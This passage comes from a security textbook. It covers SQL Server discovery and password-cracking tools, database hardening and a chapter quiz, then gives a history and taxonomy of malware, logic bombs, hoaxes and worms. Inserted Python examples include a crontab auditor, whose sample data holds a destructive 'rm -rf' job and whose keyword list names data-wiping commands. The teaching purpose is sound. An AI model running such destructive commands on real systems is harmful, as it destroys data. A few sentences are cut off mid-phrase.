SQL Server installations are becoming increasingly difficult to discover, assess, and maintain. SQLRecon is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret out servers you never knew existed on your network so you can properly secure them.” Running a scan with either of these tools will give you information about where you may have SQL Server installations that you are unaware of.

NOTE
Don’t get caught in the trap of thinking that these tools should be run only to detect hidden servers when you suspect that they exist. You should consider periodically running these tools, or similar ones, as an audit mechanism to detect servers that may pop up from time to time.

NOTE
The tools discussed so far have been targeted toward SQL Server, but other vendors have their databases on the market, too. If you need to crack passwords in some of these other technologies, a good tool is Cain. This tool has the ability to crack database password hashes such as those used by SQL Server, MySQL, and Oracle.

Database Server Password Cracking

After a database has been located, the next step an attacker can choose to take is to see whether the password can be broken. A feature that is included in SQLPing 3.0 is a password-cracking capability that can be used to target a database server and break its passwords. The password-cracking capabilities included with the product include the ability to use dictionary-based cracking methods to bust the passwords.

Locating Vulnerabilities in Databases

Every database is prone to its own types of vulnerabilities, but there are some common ones that can be exploited using the right tools.
Some common vulnerabilities include:

• Unused stored procedures
• Service account privilege issues
• Weak or poor authentication methods enabled
• No (or limited) audit log settings

Having knowledge of the database that you are using can go a long way toward thwarting these problems, but there are some other methods that can be used. One effective method for uncovering problems is to consider the security problem from both an insider’s and an outsider’s perspective. Use tools and methods that an attacker who has no knowledge of the system might use. Two pieces of software that are useful for performing audits on databases are known as NGSSquirrel and AppDetective.

NGSSquirrel from NGS Software is a tool used to audit databases to uncover vulnerabilities. In NGS Software’s own words from its Web site: “NGSSQuirreL for Oracle is our vulnerability assessment scanner that sets the standard. Developed with the help of the highly experienced NGSResearch Team, it has been specifically developed for use with Oracle Database Servers, allowing system administrators and security professionals to expose potential vulnerabilities. More than simply a scanner, it provides the capability to audit password quality, rectify identified threats, and manage users and roles as well as system and object privileges.”

NOTE
NGS Software offers versions of this product for Oracle, SQL Server, DB2, Sybase, and Informix.

The other software mentioned is AppDetective. In the vendor’s own words: “With a policy driven scanning engine, AppDetectivePro identifies vulnerabilities and misconfigurations. Issues identified include default or weak passwords, missing patches, poor access controls, and a host of other conditions. A flexible assessment framework allows auditors to choose between an outside-in, ‘hacker’s eye view’ of the database which requires no credentials, or a more thorough inside-out scan which is facilitated through a read-only database account.
AppDetectivePro includes built-in templates to satisfy the requirements of security best practices and various regulatory compliance initiatives. Compliance standards covered include DISA STIG, NIST 800-53 (FISMA), PCI DSS, HIPAA, GLBA, Sarbanes-Oxley, ISO 27001, Basel II, and Canada’s MITS.”

Out of Sight, Out of Mind

Protecting databases can be as simple as making sure their existence is not so obvious. Keeping a database hidden from casual and even some aggressive scans by attackers is not a difficult task because the tools are quite often at your fingertips. Most Web servers, Web applications, and the databases hosted in the environment include some security features that can make a huge difference in protecting the database from would-be attackers:

• Learn the provided security features in the database system — Protect the stability of the database and its surrounding applications by evaluating the use of what is known as process isolation. Process isolation provides extra protection against catastrophic failure of a system by ensuring that one process crashing will not take others with it.
• Evaluate the use of nonstandard ports — Some applications must run on standard ports such as 1433 for SQL Server. If your application does not require a specific port, consider changing it to one that is not commonly looked for or is unusual, making an attacker have to do more work.
• Keep up to date — Keep on top of the patches and service packs that are made available for your system. Apply the patches where appropriate to ensure that you do not become a victim of a bug or defect that has already been addressed.
• It’s as good as its foundation — The database doesn’t live on an island someplace by itself; it is installed on an operating system. Ensure that the operating system in use always has the latest patches and service packs installed.
• Use a firewall — Don’t fling a database into the void; use a firewall to protect it.
A good firewall can provide tremendous protection to a database server, making sure that too much information is never exposed.

CHAPTER SUMMARY

Today the public face of just about every organization is its Web site, along with its Web application and the features they offer. Companies tend to host a wide variety of content on the servers that their customers or potential customers will be interacting with. A Web site being the first point of contact for customers is also something that is an attractive target for an attacker. With a well-placed attack, an individual with an ax to grind can embarrass a company by defacing its Web site or stealing information. As a security professional, one of the tasks you are charged with is safeguarding this asset and the infrastructure that is attached to it.

Defending a Web server requires special care and knowledge to make the information and content available, but at the same time protect it from unnecessary exposure to threats. This task is trickier than it sounds because a balance has to be struck between making the content accessible to the appropriate audience while at the same time ensuring that it is secure. In addition, the Web server cannot be considered a standalone entity, because it will usually be attached to the organization’s own network, meaning that threats against the server can flow over into the company network as well. Making the situation more complex is the fact that Web servers may not only host regular Web pages but also Web applications and databases. More and more organizations are looking to Web services such as streaming video and Web applications such as SharePoint to make a more dynamic experience for their clients. More organizations are hosting content such as databases online for a wide range of reasons.
Each of these situations represents another detail that the security professional must address properly to make sure that the server and the organization are safe and secure.

KEY CONCEPTS AND TERMS

Cross-site scripting (XSS)
Ports
Structured Query Language (SQL)

CHAPTER 9 ASSESSMENT

1. ____ validation is a result of SQL injections.
A. True
B. False

2. Web applications are used to ____.
A. Allow dynamic content
B. Stream video
C. Apply scripting
D. Security controls

3. Which of the following challenges can be solved by firewalls?
A. Protection against buffer overflows
B. Protection against scanning
C. Enforcement of privileges
D. Ability to use nonstandard ports

4. Databases can be a victim of source code exploits.
A. True
B. False

5. The stability of a Web server does not depend on the operating system.
A. True
B. False

6. ____ are scripting languages.
A. ActiveX
B. Java
C. CGI
D. ASP.NET

7. ____ is used to audit databases.
A. Ping
B. IPConfig
C. NGSSquirrel

8. Browsers do not display ____.
A. ActiveX
B. Hidden fields
C. Java
D. JavaScript

9. ____ can be caused by the exploitation of defects and code.
A. Buffer overflows
B. SQL injection
C. Buffer injection
D. Input validation

CHAPTER 10 Malware, Worms, and Viruses

ONE OF THE PROBLEMS in the technology business that has grown considerably over the years is the issue of malware. Malware in all its forms has moved from being a simple annoyance to one of downright maliciousness. Software in this category has evolved to the point of being dangerous, as it now can steal passwords, personal information, and plenty of other information from an unsuspecting user. Malware is nothing new, even though the term may be. The problem has existed for years under different names such as viruses, worms, adware, scareware, and spyware.
But it has become easier to spread because of the convenient distribution channel the Internet offers, as well as the increasingly clever social-engineering methods the creators of this type of software employ. Making the problem of malware even larger is the complexity of modern software, lack of security, known vulnerabilities, and users’ lax attitude toward security updates and patches. Malware or malicious code is not going to decline; in fact, the opposite is true. One type of malware, Trojans with keyloggers, saw an increase of roughly 250 percent between January 2004 and May 2006, and such a trend represents just one category. Some types of malware have seen even larger increases. It is with these points in mind that this chapter will examine the problem of malware, trends, and how to deal with the increasingly serious threat this type of software poses.

Chapter 10 Topics

This chapter covers the following topics and concepts:

• What malware is
• What viruses are and how they function
• What worms are and how they function
• What spyware is
• What adware is
• What scareware is

Chapter 10 Goals

When you complete this chapter, you will be able to:

• List the common types of malware found in the wild
• Describe the threats posed by malware
• Describe the characteristics of malware
• Describe the threats posed by viruses
• Identify the different characteristics of malware
• Identify removal techniques and mitigation techniques for malware

Malware

The term malware is often tossed around, but what exactly does it mean? Malware refers to software that performs any action or activity without the knowledge or consent of the system’s owner. But the definition of malware can be expanded to include any software that is inherently hostile, intrusive, or annoying in its operation. In the past, malware was designed to infect and disrupt, disable, or even destroy systems and applications.
In some cases this disruption went one step further and used an infected system as a weapon to disable or disrupt other systems. In recent years the nature of malware has changed, with the software seeking to remain out of sight in an effort to evade detection and removal by the system owner for as long as possible. All the while, the malware is resident on a system taking up resources and power for whatever purpose the attacking or infecting party may have in mind.

In the present day malware has changed in nature dramatically, with the criminal element realizing the advantages of using it for more malicious purposes. In the past it was not uncommon for malware to be written as a prank or to annoy the victim, but times have changed. Malware in the current day has been adopted by criminals for a wide array of purposes to capture information about the victim or commit other acts. As technology has evolved, so has malware — from the annoying to the downright malicious.

NOTE
Malware is a contraction for the term malicious software, which gives a much more accurate picture of the goal of this class of software.

NOTE
If the definition of malware is limited to just software that performs actions without the user’s knowledge or consent, this could include a large amount of software on the average system. It is also important to classify as malware software that is hostile in nature.

FYI
Increasing amounts of malware have shown up over the past decade with the goal of making some sort of financial gain for their creators. In the 1990s the idea of financial gain from such software started in the form of dialers that would use a computer’s modem to call up numbers such as adult services or other types to generate revenue. Over the last few years the tactics have changed, however, with malware tracking a person’s actions all the way to targeting ads and other items on a victim’s system.
The term malware used to cover just viruses, worms, Trojans, and other similar software that performed no useful function or carried out malicious activities. Malware has evolved to include new forms, such as spyware, adware, and scareware. Software that used to just dial up systems or be annoying now redirects browsers, targets search engine results, or even displays advertisements on a system.

Another aspect of malware that has emerged is its use to steal information. Malware programs have been known to install what is known as a keylogger on a system. The intention here is to capture keystrokes when entered with the intention of gathering information such as credit card numbers, bank account numbers, or other similar information. For example, malware has been used to steal information from those engaging in online gaming to obtain players’ game account information.

Malware doesn’t necessarily hide from the user in every case; it depends on the intended purpose of the creator. In some cases, spyware creators have stated their intentions outright by presenting end user license agreements (EULAs) to the victim. Because most users never read EULAs and the document looks legitimate, they tend to install the software without realizing that the document may clear the attacker of responsibility.

The popular online game by Activision Blizzard known as World of Warcraft (WoW) has been a target of multiple keyloggers since its debut. The intention with most keyloggers that have targeted this game has been to capture what is known as an Authentication Code, used to authenticate user accounts. When a victim is infected, the code is intercepted when entered and a false code is sent to the WoW servers. The attackers get the real code at this point and can now log onto the account directly while the victim is left out in the cold.
Malware’s Legality

Malware has tested and defined legal boundaries since it came into being. Lawmakers have passed statutes specifically to deal with the problem. Malware initially was perceived as being harmless, relegated to the status of a prank. But times changed — a more serious look at the problem of malware became necessary. Over the past few years the problems malicious code poses have been addressed technologically. In addition, new legal remedies have emerged in several countries. In the United States several laws have been introduced since the 1980s. Some of the more notable ones include:

• The Computer Fraud and Abuse Act 1986 — This law was originally passed to address federal computer-related offenses and the cracking of computer systems. The act applies to cases that involve federal interests, or situations involving federal government computers or those of financial institutions. Additionally the law covers computer crime that crosses state lines or jurisdictions.
• The Patriot Act — This expanded on the powers already included in the Computer Fraud and Abuse Act. The law:
  • Provides penalties of up to 10 years for a first offense and 20 years for a second offense
  • Assesses damages over the course of a year to multiple systems to determine if such damages are more than $5,000 total
  • Increases punishment for any violation that involves systems that process information relating to the justice system or military
  • Covers damage to foreign computers involved in US interstate commerce
  • Includes, in calculating damages, the time and money spent investigating a crime
  • Makes selling computer systems infected with malware a federal offense.

In 2009 Canada enacted the Electronic Commerce Protection Act (ECPA), which was designed to meet the problem of malware head-on. The ECPA has several provisions for both spam and malware designed to limit the proliferation of the software both inside and outside Canada. The act introduces some steep fines of up to $10 million for an organization and $1 million for an individual for those installing unauthorized software on a system.

Each country has approached the problem of malware a little differently, with penalties ranging from jail time to potentially steep fines for violators. In the United States, states such as California, West Virginia, and a host of others have put in place laws designed to punish malware perpetrators. While the laws have different penalties designed to address malware’s effects, it has yet to be seen what the effects of these laws will be.

Types of Malware

While the term malware may refer to any software that fits the definition, it is also important to understand the specifics and significance of each piece of software under the malware banner. A broad range of software types and categories exists, some of which have been around for a long time. Malware includes the following:

• Viruses
• Worms
• Spyware
• Scareware
• Trojan horses
• Rootkits

The latter two will be discussed in the next chapter.

Malware’s Targets

A quick review of the targets of malware authors gives a good taste of why the problem is so serious:

• Credit card data — Credit card data and personal information is a tempting and all too common target. Upon obtaining this information an attacker can go on a shopping spree, purchasing any type of product or service: Web services, games, merchandise, or other products.
• Passwords — Passwords are another attractive target for attackers. The compromise of this sort of information can be devastating to the victim. Most individuals will reuse passwords over and over again, and stealing a person’s password can easily open many doors to the attacker. Stealing passwords can allow a hacker to read passwords from a system that includes everything from e-mail and Internet accounts
• Insider information — Confidential or insider information is another target for an attacker. An attacker may very well use malware to gain such information from an organization to gain a competitive or financial benefit.
• Data storage — In some cases a system infected with malware may find itself a point for storing data without the owner’s knowledge. Uploading data to an infected system can turn that system into a server hosting any type of content. This has included illegal music or movies, pirated software, pornography, financial data, or even child pornography.

Viruses and How They Function

A virus is one of the oldest pieces of software that fits under the definition of malware. It may also be one of the most frequently misunderstood. The term virus is frequently used to refer to all types of malware.

Before getting too far into a discussion of viruses it is important to make clear first what a virus actually is and the behaviors viruses exhibit. A virus is a piece of code or software that spreads from system to system by attaching itself to other files. When the file is accessed, the virus is activated. Once activated, the code carries out whatever attack or action the author wishes to execute, such as corrupting data or destroying it outright.

Viruses have a long history, one that shows how this form of malware adapted and evolved as technology and detection techniques improved. Let’s examine the “back story” of viruses, how they have changed with the times, and how this affects you as a security professional.

Viruses: A History

As stated earlier, viruses are nothing new; the first viruses debuted in the “wild” roughly 40 years ago as research projects. They have evolved dramatically since then into the malicious weapons they are today.

The first recognized virus was created as a proof-of-concept application designed in 1971 to demonstrate what was known as a mobile application. In practice the Creeper virus, as it was known, spread from system to system by locating a new system while resident on another. When a new system was found the virus would copy itself and delete itself off the old one. Additionally the Creeper virus would print out a message on the infected machine that stated “I’m the Creeper, catch me if you can.” In practice the virus was harmless and was not that advanced compared with modern examples.

NOTE
A second piece of code, known as the Reaper, was specifically designed to remove the Creeper from circulation.

NOTE
The term virus was not coined until the 1980s, so the negative term was not applied to these early examples.

In the mid-1970s a new feature was introduced in the Wabbit virus. The Wabbit virus represented a change in tactics in that it demonstrated one of the features associated with modern day viruses — replication. The virus replicated on the same computer over and over again until the system was overrun and eventually crashed.

In 1982 the first virus seen outside academia debuted in the form of the ElkCloner virus. This piece of malware debuted another feature of later viruses — the ability to spread rapidly and remain in the computer’s memory to cause further infection. Once resident in memory, it would infect floppy disks placed into the system later, as many later viruses would do.

NOTE
The ElkCloner virus was developed by Rich Skrenta when he was all of 15 years old. He developed the virus to have fun with friends who no longer trusted floppies that he gave them. He came up with the novel concept of infecting floppies with a memory-resident program.

Four short years later, the first PC-compatible virus debuted. The viruses prior to this point were Apple II types or designed for specific research networks. In 1986 the first of what was known as boot sector viruses debuted, demonstrating a technique later seen on a much wider scale. This type of virus infected the boot sector of a drive and would spread its infection when the system was going through its boot process.

The first of what would later be called logic bombs debuted in 1987: the Jerusalem virus. This virus was designed to cause damage only on a certain date, in this case Friday the 13th. The virus was so named because of its initial discovery in Jerusalem.

Multipartite viruses made their appearance in 1989 in the Ghostball virus. This virus was designed to cause damage using multiple methods and components, all of which had to be neutralized and removed to clear out the virus effectively.

Polymorphic viruses first appeared in 1992 as a way to evade early virus-detection techniques. Polymorphic viruses are designed to change their code and “shape” to avoid detection by virus scanners, which would look for a specific virus code and not the new version.

Fast-forward to 2008 and Mocmex. Mocmex was shipped on digital photo frames manufactured in China. When the virus infected a system, its firewall and antivirus software were disabled; then the virus would attempt to steal online-game passwords.

Modern viruses and virus writers have gotten much more creative in their efforts and in some cases are financed by criminal organizations to build their software.

NOTE
The first logic bomb most individuals heard of was the Michelangelo virus, designed to infect on the famous painter’s birthday. In reality the virus was a great non-event — it was discovered before it could cause any serious damage.

Types of Viruses

So you can see that not all viruses are the same; there are several variations of viruses, each of which is dangerous in its own way. Understanding each type of virus can give you a better idea of how to thwart them and address the threats they pose.

CHAPTER 10 Malware, Worms, and Viruses

On October 29, 2003, a logic bomb was discovered at Fannie Mae, the Federal National Mortgage Association, in the United States. The bomb was created and installed by Rajendrasinh Makwana, an IT contractor who worked in Fannie Mae’s Urbana, Maryland, facility. As designed, the bomb was to activate on January 31, 2009. If successful, it would have wiped all of Fannie Mae’s more than 4,000 servers.

Makwana, upset that he had been terminated, planted the bomb before his network access
was terminated. He was indicted in a Maryland court on January 27, 2009, for unauthorized
computer access.

Logic Bombs

A logic bomb is a piece of code or software designed to lie in wait on a system until a specified event occurs. When the event occurs the bomb “goes off” and carries out its destructive behavior as the creator intended. While the options are literally endless as far as what a logic bomb can do, the common use of this type of device is to destroy data or systems.

Logic bombs have been notoriously difficult to detect because of their very nature of being “harmless” until they activate. Malware of this type is simply dormant until whatever it is designed to look for happens. What can activate this software is known as a positive or negative trigger event coded in by the creator. A positive trigger is a mechanism that looks for an event to occur such as a date. A negative trigger, on the other hand, is designed to monitor an action; when such action does not occur it goes off. An example would be if a user does not log on for some period. This process of “hiding” until an event occurs or does not occur makes this particular type of malware dangerous.

As a security professional you will have to be extra vigilant to detect logic bombs before they do damage. Traditionally the two most likely ways to detect this type of device are by accident or after the fact. In the first method, an IT worker just happens to stumble upon the device by sheer “dumb luck” and deactivates the bomb. In the second method, the device “detonates” and then the cleanup begins. The best detection and prevention methods are to be vigilant, to limit access of employees to only what is necessary, and to restrict access where possible.
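The date-pinned “positive trigger” described above has a recognizable shape in a system’s scheduled jobs, and reviewing those jobs is one concrete form of the vigilance the text recommends. As an added example (not from this book), the Python script below audits crontab-style entries and flags jobs pinned to a single calendar date or carrying data-destroying commands; the crontab lines and the keyword list are constructed for illustration, and a negative trigger (a job that fires when something does not happen) would need a different check.

```python
"""Audit crontab-style schedules for logic-bomb-shaped entries.

Added example, not the book's code. A positive trigger keyed to a date
often shows up as a scheduled job whose day-of-month AND month are both
fixed, so it fires once per year on one specific date. Pairing that with
a destructive command is the classic logic-bomb pattern.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed list of command fragments that typically destroy data.
# Real reviews would extend this to the tooling used on the host.
DESTRUCTIVE = ("rm -rf", "shred", "mkfs", "dd if=", "format ", "del /")


@dataclass
class Finding:
    line: str
    reasons: List[str]


def _is_fixed(field: str) -> bool:
    """True if a cron field is a single literal number (no '*', ranges, steps or lists)."""
    return re.fullmatch(r"\d+", field) is not None


def audit_cron_line(line: str) -> Optional[Finding]:
    """Return a Finding for a suspicious cron line, or None.

    Blank lines, comments and @-shortcuts (fewer than six fields) are skipped.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    parts = stripped.split(None, 5)  # minute hour dom month dow command
    if len(parts) < 6:
        return None
    _minute, _hour, dom, month, _dow, command = parts
    reasons = []
    if _is_fixed(dom) and _is_fixed(month):
        reasons.append(f"pinned to a single date ({month}/{dom})")
    if any(frag in command for frag in DESTRUCTIVE):
        reasons.append("destructive command")
    return Finding(stripped, reasons) if reasons else None


def audit_crontab(text: str) -> List[Finding]:
    """Audit every line of a crontab and return all Findings in order."""
    return [f for f in (audit_cron_line(l) for l in text.splitlines()) if f]


# Constructed sample crontab: one ordinary backup job, one yearly report,
# one log rotation, and one job that fires once on January 31 and wipes data.
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 2 * * *   /usr/local/bin/backup.sh
30 6 31 1 * /tmp/.cleanup.sh && rm -rf /srv/data
0 * * * 1-5 /usr/bin/rotate-logs
15 3 1 * *  /opt/reports/monthly.sh
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding.line, "->", "; ".join(finding.reasons))
```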

Polymorphic Viruses

The polymorphic virus is unique because of its ability to change its “shape” to evade
antivirus programs and therefore detection. In practice this type of malware possesses
code that allows it to hide and mutate itself in random ways that prevent detection.
This technique debuted in the late 1980s as a method to avoid the detection techniques
of the time.

240 PART 2 A Technical Overview of Hacking

Polymorphic viruses employ a series of techniques to change or mutate; these methods include:

• Polymorphic engines — Designed to alter or mutate the device’s design while keeping the payload, the part that does the damage, intact

• Encryption — Used to scramble or hide the damaging payload, keeping antivirus engines from detecting it

When in action, polymorphic viruses rewrite or change themselves upon every execution. The extent of the change is determined by the creator of the virus and can range from a simple rewrite to changes in encryption routines or alteration of code.

Modern antivirus software is much better equipped to deal with the problems
polymorphic viruses pose. Techniques to detect these types of viruses include decryption
of the virus and statistical analysis and heuristics designed to reveal the software’s
behavior.

Multipartite Viruses

The term multipartite refers to a virus that infects using multiple attack vectors, including the boot sector and executable files on the hard drive. What makes these types of viruses dangerous and powerful weapons is that to stop them, you must totally remove all their parts. If any part of the virus is not eradicated from the infected system, it can re-infect the system.

Multipartite viruses represent a problem because they can reside in different locations and carry out different activities. This class of virus has two parts, a boot infector and a file infector. If the boot infector is removed the file infector will re-infect the computer. Conversely, if the file infector is removed the boot sector will re-infect the computer.

Macro Viruses

Macro viruses are a class of virus that infects and operates through the use of a macro language. A macro language is a programming language built into applications such as Microsoft Office in the form of Visual Basic for Applications (VBA). It is designed to automate repetitive tasks. Macro viruses have been very effective because users have lacked the protection or knowledge to counteract them.

Macro viruses can be implemented in different ways, usually by being embedded into a file or spread via e-mail. The initial infections spread quite quickly because earlier applications would run the macro when a file was opened or when an e-mail was viewed. Since the debut of these viruses, most modern applications disable the macro feature or ask users whether they want to run macros.

NOTE

After the initial outbreaks of macro viruses, Microsoft introduced the ability to disable macros. In Office 2010 macros are disabled by default.


Hoaxes

A hoax is not a true virus. But no discussion of viruses is complete without mentioning the hoax virus. Hoax viruses are those designed to make the user take action even though no infection or threat exists. The following example is an e-mail that actually is a hoax virus:

PLEASE FORWARD THIS WARNING AMONG FRIENDS, FAMILY AND CONTACTS: You should be alert during the next days: Do not open any message with an attached file called “Invitation” regardless of who sent it. It is a virus that opens an Olympic Torch which “burns” the whole hard disc C of your computer. This virus will be why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it. If you receive a mail called “Invitation,” though sent by a friend, do not open it and shut down your computer immediately. This is the worst virus announced by CNN; it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. SEND THIS E-MAIL TO EVERYONE YOU KNOW, COPY THIS E-MAIL AND SEND IT TO YOUR FRIENDS AND REMEMBER: IF YOU SEND IT TO THEM, YOU WILL BENEFIT ALL OF US.

Here’s another example:

There’s a new virus which was found recently which will erase the whole C drive. If you get a mail with the subject “Economic Slow Down in US” please delete that mail right away. Otherwise it will erase the whole C drive. As soon as you open it, it says “Your system will restart now … Do you want to continue?”. Even if you click on NO, your system will be shut down and will never boot again. It already caused major damage in the US and few other parts of the world. The remedy for this has not yet been discovered.

Please make sure you have backed up any local hard drive files adequately — network, floppy, etc.

In both cases a simple search of Google or discussion with the IT department of a company will reveal these to be hoaxes; however, in many cases the recipients of these messages panic and forward them on, causing further panic.

Prevention Techniques

Viruses have been in the computer and network business almost as long as the business
itself has been around. A wide variety of techniques and tools have evolved to deal with
the threat.


Education

Knowledge is half the battle. Getting system owners to understand how not to get infected or spread viruses is a huge element in stopping the problem. Users should be instructed on proper procedures to stop the spread of virus code. Such tips should generally include:

• Don’t allow employees to bring media from home

and trusted sources

• Don’t allow workers to install software without permission from the company IT department

• Inform IT or security of strange system behaviors

• Ban flash drives

• Ban portable hard drives

• Limit the use of administrative accounts

Antivirus

The next line of defense is the antivirus software that is designed to stop the spread and activity of viruses. Antiviruses are designed to run in the background on a system, staying vigilant for activity that suggests viruses and stopping or shutting it down. Antiviruses are effective tools, but they can be so only if they are kept up to date. Antiviruses rely on a database of signatures that lets them know what to look for and remove. Because new viruses are released each day, if you neglect this database it becomes much more likely a virus will get through.

Because there is a wide range of viruses and other malicious code, an antivirus must be able to detect more than a simple virus. Good antivirus software can detect viruses, worms, Trojans, phishing attacks, and, in some cases, spyware.

Antiviruses tend to use one of two different methods. The first is the suspicious behavior method. Antivirus programs use this to monitor the behavior of applications on a system. This approach is widely used as it can detect suspicious behavior in existing programs, as well as detecting suspicious behavior that indicates a new virus may be attempting

The second method is dictionary-based detection. This method will scan applications and other files when they have access to your system. The advantage of this method is that it can detect a virus almost immediately instead of letting it run and detecting the behavior later. The downside is that the method can detect only viruses that it knows about — if you neglect to update the software it cannot detect new viruses.
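To make the difference between dictionary-based detection and the statistical heuristics mentioned under polymorphic viruses concrete, here is an added Python example (not the book’s code): a signature scanner that recognizes only byte patterns already in its database, next to a Shannon-entropy heuristic that flags scrambled or encrypted content it has never seen. The signature entries, the sample files, and the 6.5 bits/byte threshold are all constructed assumptions for this example.

```python
"""Dictionary (signature) scanning beside an entropy heuristic.

Added example, not the book's code. The signature scanner finds only what
is already in its dictionary, which is why a stale database or a virus
that re-encrypts itself defeats it. The entropy heuristic is one of the
"statistical analysis" techniques the polymorphic-virus section mentions:
encrypted or scrambled bytes look nearly random, and that stands out
without any signature at all.
"""
import math
from collections import Counter
from typing import Dict, List

# Constructed signature dictionary: name -> byte pattern. A real product
# ships many thousands of these and must be updated constantly.
SIGNATURES: Dict[str, bytes] = {
    "Sample.A": b"SAMPLE-MARKER-A",
    "Sample.B": b"\x4d\x5a\x90\x00SAMPLEB",
}


def scan_signatures(data: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Dictionary-based detection: names of every known pattern found in data."""
    return [name for name, pattern in signatures.items() if pattern in data]


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant stream, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_regions(data: bytes, window: int = 512, threshold: float = 6.5) -> List[int]:
    """Heuristic: offsets of fixed-size windows whose entropy exceeds threshold.

    Plain text and ordinary code usually sit well below 6.5 bits/byte;
    encrypted or compressed payloads approach 8. The threshold is a tunable
    assumption, not a published constant.
    """
    return [off for off in range(0, len(data), window)
            if shannon_entropy(data[off:off + window]) > threshold]


def classify(data: bytes) -> dict:
    """Combine both methods into one verdict for a file's bytes."""
    hits = scan_signatures(data)
    regions = high_entropy_regions(data)
    return {"signature_hits": hits,
            "high_entropy_regions": regions,
            "suspicious": bool(hits or regions)}


def _pseudo_random(n: int, seed: int = 12345) -> bytes:
    """Deterministic stand-in for encrypted data (a simple LCG, not a cipher)."""
    out = bytearray()
    x = seed
    for _ in range(n):
        x = (1103515245 * x + 12345) & 0x7FFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


# Constructed samples: ordinary text, a file carrying a known signature,
# and a small clear-text stub followed by scrambled bytes (the shape of an
# encrypted payload with a decryption loop in front of it).
CLEAN_TEXT = b"The quick brown fox jumps over the lazy dog. " * 20
KNOWN_SAMPLE = b"header" + SIGNATURES["Sample.A"] + b"trailer " * 30
SCRAMBLED = b"stub-loader-code" + _pseudo_random(1024)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_TEXT), ("known", KNOWN_SAMPLE), ("scrambled", SCRAMBLED)):
        print(label, classify(blob))
```

The signature scanner returns nothing for the scrambled sample while the entropy heuristic flags it, which is the gap that signature-only detection leaves against polymorphic code.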


Another detail that you cannot overlook is applying patches on systems and software when they become available. Vendors of operating systems and applications such as Microsoft regularly release patches designed to close holes and address vulnerabilities on systems that viruses could exploit. Missing a patch or update can easily mean the difference between avoiding a problem

NOTE

Microsoft is one of many software vendors that have patches. In Microsoft’s case a monthly event known as Patch Tuesday is specifically security issues.

Worms and How They Function

NOTE

Worms can cause alterations to or corruption of data on a system, but can also cause damage indirectly by replicating at a rapid rate, clogging networks with traffic they cannot handle.

Worms are a different type of malware altogether. Viruses require user intervention for their infection to take place — such as the opening of a file or the booting of a computer. In the case of worms, however, no user action is required. A worm is a self-replicating piece of software that combines the convenience of computer networks with the power of malware. Worms also differ from viruses in that viruses require a host program to stay resident. A worm does not require this and is actually self-contained. Worms also can cause substantially more harm than a virus, which is typically limited to corrupting data and applications.

An earlier chapter mentioned the earliest recognized worm, known now as the Morris worm. This worm exhibited some of the traits associated with modern-day worms, particularly the ability to rapidly replicate. At the time the Morris worm was unleashed, the Internet was small compared with today, but the effect was no less devastating. The worm replicated so rapidly and so aggressively that networks were clogged with traffic and brought down. Estimates at the time placed the damage from the outbreak at $10 million (not adjusted for inflation).

One worm that caused widespread damage was the SQL Slammer or Slammer worm. The Slammer worm was responsible for widespread slowdowns and denials of service on the Internet. It was designed to exploit a known buffer overflow in Microsoft’s SQL Server and SQL Server Desktop Engine products. Even though Microsoft had released a software patch six months before the actual infection, many had neglected to install the patch, and therefore the vulnerability still existed on many systems. As a result, in the early morning hours of January 25, 2003, the worm became active and in less than 10 minutes had infected 75,000 machines.

NOTE

The fallout from the Morris worm is still debated today, with damage estimates ranging up to $100 million and several thousand computers or more infected. While the numbers can be argued, what cannot be is the impact of the infection. People realized that worms posed a threat and that tougher laws on cybercrime were needed.


How Worms Work

Worms are relatively simple in design and function, but very dangerous due to the speed and effectiveness with which they spread. Most worms share certain characteristics, which help define how they work and what they can do. The characteristics are as follows:

• Do not need a host program to function

• Do not require user intervention

• Replicate rapidly

• Consume bandwidth and resources

Worms can also perform some other functions, including:

• Transmit information from a victim system

• Carry a payload such as a virus

Examining these characteristics a bit more in detail will help you understand how a worm works and the challenges worms pose to a security professional. In fact, worms differ from viruses in two key ways:

• A worm can be considered a special type of malware that can replicate and consume memory, but not attach to other programs.

• A worm spreads through infected networks automatically, while a virus does not.

One of the main characteristics of worms is that they do not need a host program to function, unlike their fellow malware, viruses. Worms are designed to function by leveraging vulnerabilities on a target system that are generally unknown or unpatched. Once a worm locates one of these vulnerabilities, it infects the system and then uses the system to spread and infect other systems. A worm performs all these functions by using the system’s own processes to do its job, but does not require any host program to run before starting the initial process.

Another characteristic that differentiates worms from other malware is their ability to run without user intervention. Viruses, for example, require a host program to be executed for the infection to begin; worms simply need the vulnerability to exist in order for the process to take place. In the case of worms, just having a system turned on and connected to the Internet is enough to make it a target. Combine this with the vulnerabilities and the danger is obvious.

Since Day 1, worms have possessed a feature that makes them a dangerous force to deal with — their ability to replicate very rapidly. One of the features of the Morris worm that even its creator did not expect was that it replicated so rapidly that it choked up networks and shut them down quite effectively. This feature has been a characteristic of worms ever since. Worms can replicate so quickly that their creators are frequently caught off guard. This replication is made possible by a number of factors, including poorly maintained systems, networked systems, and the number of systems linked via the Internet.

NOTE

The Slammer worm doubled the number of infected machines every 8.5 seconds, much faster than previous worms. Slammer boasted an infection rate that was 250 times as fast as Code Red, years earlier.


Light Side Versus Dark Side

Some worms have been created for benign purposes. One such family of worms is the Nachi family. Nachi was designed to locate systems that had certain vulnerabilities not patched by the system owner. It would then download the appropriate patches to fix the problem.

Such worms introduced several questions. Among them was, if a worm has benign purposes in mind, is it OK? This question has compelling arguments on both sides.

NOTE

One of the earliest warning
signs of worms is the
unexplained slowdown of a
system even after repeated
reboots or other checks. While
not always a sign of a worm,
it is one of the red flags that
the system owner should
investigate.

